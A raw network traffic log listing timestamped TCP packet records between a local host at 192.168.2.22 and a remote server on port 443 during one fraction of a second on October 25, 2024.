Oct 25, 2024 19:51:32.550035954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.550082922 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.550088882 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.554867983 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.554922104 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.554929018 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.560204983 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.560260057 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.560267925 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.565419912 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.565479994 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.565489054 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.570822954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.570882082 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.570889950 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.575875044 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.575937986 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.575948000 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.579045057 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.579094887 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.579102039 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.582355976 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.582410097 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.582417965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.585752964 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.585803032 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.585809946 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.588979006 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.589035988 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.589044094 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.592096090 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.592155933 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.592168093 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.595408916 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.595468998 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.595477104 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.598359108 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.598412991 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.598419905 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.601439953 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.601484060 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.601491928 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.604520082 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.604583025 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.604592085 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.607542038 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.607598066 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.607604980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.610503912 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.610559940 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.610568047 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.613487959 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.613548040 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.613557100 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.616441965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.616502047 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.616513014 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.619359970 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.619416952 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.619426966 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.622313976 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.622380972 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.622387886 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.625129938 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.625191927 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.625200987 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.627862930 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.627923965 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.627932072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.630726099 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.630784035 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.630791903 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.633547068 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.633621931 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.633629084 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.636148930 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.636221886 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.636229992 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.639043093 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.639101028 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.639107943 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.641647100 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.641705036 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.641710997 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.644216061 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.644270897 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.644278049 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.647078037 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.647135019 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.647142887 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.649488926 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.649548054 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.649555922 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.652076960 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.652136087 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.652144909 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.655123949 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.655152082 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.655181885 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.655193090 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.655241013 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.657195091 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.659862995 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.659893990 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.659914017 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.659925938 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.660079002 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.662285089 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.665971994 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.665993929 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.666028976 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.666040897 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.666081905 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.667380095 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.669904947 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.669950962 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.669960022 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.672386885 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.672410965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.672445059 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.672454119 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.672498941 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.674988985 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.677208900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.677232981 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.677259922 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.677269936 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.677314043 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.679737091 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.681886911 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.681937933 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.681945086 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.684361935 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.684382915 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.684416056 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.684425116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.684475899 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.686830997 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.689035892 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.689089060 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.689095974 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.691487074 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.691553116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.691553116 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.691565037 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.691612005 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.693809032 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.696094990 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.696115017 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.696144104 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.696152925 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.696197987 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.698571920 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.700345993 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.700400114 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.700407982 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.702723026 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.702749968 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.702786922 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.702794075 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.702845097 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.704500914 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.706828117 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.706865072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.706880093 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.706887960 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.706923962 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.708354950 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.710577965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.710608959 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.710618019 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.710624933 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.710652113 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.712424994 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.714340925 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.714365005 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.714406967 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.714415073 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.714456081 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.716278076 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.718151093 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.718198061 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.718204975 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.719213009 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.719257116 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.719261885 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.721115112 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.721163034 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.721168995 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.722917080 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.722971916 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.722978115 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.724893093 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.724941969 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.724947929 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.726733923 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.726794004 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.726800919 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.728616953 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.728667021 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.728672981 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.730171919 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.730225086 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.730232954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.731997013 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.732048035 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.732054949 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.733727932 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.733779907 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.733786106 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.735443115 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.735498905 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.735505104 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.737267971 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.737333059 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.737346888 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.738791943 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.738838911 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.738845110 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.740551949 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.740595102 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.740602016 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.742701054 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.742755890 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.742762089 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.743897915 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.743954897 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.743962049 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.745491982 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.745543957 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.745549917 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.747030020 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.747077942 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.747083902 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.748678923 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.748723030 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.748728991 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.750238895 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.750289917 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.750296116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.751816988 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.751847982 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.751874924 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.751882076 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.751919031 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.753257990 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.754905939 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.754934072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.754954100 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.754961967 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.755009890 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.756494045 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.757883072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.757906914 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.757934093 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.757941961 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.757983923 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.759668112 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.761089087 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.761113882 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.761137009 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.761143923 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.761179924 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.762672901 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.763899088 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.763948917 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.763955116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.765525103 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.765549898 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.765569925 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.765575886 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.765611887 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.766750097 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.768155098 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.768202066 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.768208981 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.769722939 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.769781113 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.769787073 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.771069050 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.771099091 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.771116018 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.771121979 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.771157980 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.772363901 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.773830891 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.773852110 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.773881912 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.773889065 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.773930073 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.775048018 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.776504040 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.776535034 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.776550055 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.776561022 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.776607037 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.777816057 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.779042006 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.779084921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.779092073 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.779098988 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.779136896 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.780438900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.781732082 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.781758070 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.781781912 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.781789064 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.781826019 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.782942057 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.784316063 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.784347057 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.784365892 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.784373999 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.784416914 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.785562038 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.786771059 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.786792994 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.786818027 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.786828995 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.786870956 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.788403034 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.789309025 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.789343119 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.789356947 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.789364100 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.789405107 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.790467024 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.791935921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.791974068 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.791984081 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.791990995 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.792026997 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.793101072 CEST	443	49174	142.250.186.161	192.168.2.22
